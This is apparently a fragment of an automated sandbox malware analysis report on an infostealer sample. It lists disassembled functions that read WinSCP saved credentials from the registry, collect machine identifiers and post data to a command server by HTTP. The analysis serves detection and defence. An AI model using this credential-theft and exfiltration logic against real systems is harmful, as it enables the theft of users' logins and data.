                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406E7C
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                      • String ID: "$"$"$"$"$------$------$------$------$------$------$433cd71b7a2bdd3668a493b00ee95630$build_id$mode$status$task_id
                                                                                                                                                                                                                      • API String ID: 3702379033-1129042184
                                                                                                                                                                                                                      • Opcode ID: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
                                                                                                                                                                                                                      • Instruction ID: f28151e3697947f206a0980c25f575650e410a772d733d80a29dba40e216d304
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94bce884781040e8ff422804929f0a0c041406c1a25af2ad4ea517ec93a7a6fd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7552897194016D9ACF61EB62CD46BCCB3B5AF04308F4184E7A51D73161DA746FCA8FA8
                                                                                                                                                                                                                      Function 0040E186 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040E1B7
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040E1D7
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040E1E8
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0040E1F9
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E22D
                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E25E
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E276
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E29D
                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E2BD
                                                                                                                                                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2E0
                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368E7), ref: 0040E379
                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3D9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                                                      • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                      • API String ID: 463713726-2798830873
                                                                                                                                                                                                                      • Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                                                                                                                      • Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5
                                                                                                                                                                                                                      Function 00405F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466networkstringmemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 918 405f39-405ffe call 410519 call 404ab6 call 4104e7 * 5 InternetOpenA StrCmpCA 933 406000 918->933 934 406006-40600c 918->934 933->934 935 406012-40619c call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 934->935 936 4066ff-406727 InternetCloseHandle call 408048 934->936 935->936 1012 4061a2-4061dc HttpOpenRequestA 935->1012 941 406766-4067ec call 402920 * 4 call 401cde call 402920 call 41d016 936->941 942 406729-406761 call 410549 call 410609 call 41058d call 402920 936->942 942->941 1013 4061e2-4061e8 1012->1013 1014 4066f3-4066f9 InternetCloseHandle 1012->1014 1015 406206-406690 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA 1013->1015 1016 4061ea-406200 InternetSetOptionA 1013->1016 1014->936 1159 4066d2-4066ea InternetReadFile 1015->1159 1016->1015 1160 406692-40669a 1159->1160 1161 4066ec-4066ed InternetCloseHandle 1159->1161 1160->1161 1162 40669c-4066cd call 410609 call 41058d call 402920 1160->1162 1161->1014 1162->1159
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                        • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,",mode,004378D8,------,004378CC,433cd71b7a2bdd3668a493b00ee95630,",build_id,004378B4,------,004378A8,",0043789C,------), ref: 004065FD
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00406639
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00406662
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                      • String ID: "$"$"$------$------$------$------$433cd71b7a2bdd3668a493b00ee95630$build_id$mode
                                                                                                                                                                                                                      • API String ID: 3702379033-3524701274
                                                                                                                                                                                                                      • Opcode ID: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                                                                                                                                                      • Instruction ID: 82dd920f4857eb4424cccb8e833476094bcda5e32b3baf042c939ae059a0737f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89793100b31f161b87fc7d4451beb843dbd63545ddb40e14516daf7b13bddfee
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF22B9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8
                                                                                                                                                                                                                      Function 00418643 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 1262 418643-418653 call 41859a 1265 418844-4188a1 LoadLibraryA * 5 1262->1265 1266 418659-41883f call 407d47 GetProcAddress * 20 1262->1266 1268 4188a3-4188b0 GetProcAddress 1265->1268 1269 4188b5-4188bc 1265->1269 1266->1265 1268->1269 1271 4188e7-4188ee 1269->1271 1272 4188be-4188e2 GetProcAddress * 2 1269->1272 1273 4188f0-4188fd GetProcAddress 1271->1273 1274 418902-418909 1271->1274 1272->1271 1273->1274 1276 41890b-418918 GetProcAddress 1274->1276 1277 41891d-418924 1274->1277 1276->1277 1278 418926-41894a GetProcAddress * 2 1277->1278 1279 41894f 1277->1279 1278->1279
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418684
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 0041869B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004186B2
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004186C9
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004186E0
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004186F7
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 0041870E
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418725
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 0041873C
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418753
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 0041876A
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418781
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418798
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004187AF
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004187C6
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004187DD
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004187F4
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 0041880B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418822
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418839
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75670000,004184C2), ref: 004188AA
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75750000,004184C2), ref: 004188C5
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 004188DC
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(76BE0000,004184C2), ref: 004188F7
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(759D0000,004184C2), ref: 00418912
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(773F0000,004184C2), ref: 0041892D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32 ref: 00418944
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2238633743-0
                                                                                                                                                                                                                      • Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                                                                                                                      • Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55
                                                                                                                                                                                                                      Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 1280 413b86-4145a5 call 4104e7 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4115d4 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411684 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4109a2 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 GetCurrentProcessId call 41224a call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410b30 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411807 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411997 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c85 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410c53 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411563 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410ddb call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410cc0 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410d2e call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410f51 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411007 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410fba call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411119 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411192 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4114a5 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 411203 call 4105c7 call 41058d call 402920 * 2 call 411203 call 4105c7 call 41058d call 402920 * 2 call 410609 call 41058d call 402920 call 401cfd lstrlenA call 4104e7 call 416e97 call 402920 * 2 call 401cde
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
                                                                                                                                                                                                                        • Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
                                                                                                                                                                                                                        • Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
                                                                                                                                                                                                                        • Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16
                                                                                                                                                                                                                        • Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
                                                                                                                                                                                                                        • Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                                                                                                                        • Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                                                                                                                        • Part of subcall function 004115D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                                                                                                                        • Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                                                                                                                        • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                                                                                        • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                                                                                                                        • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                                                                                        • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                                                                                                                        • Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                                                                                                                        • Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                                                                                                                        • Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
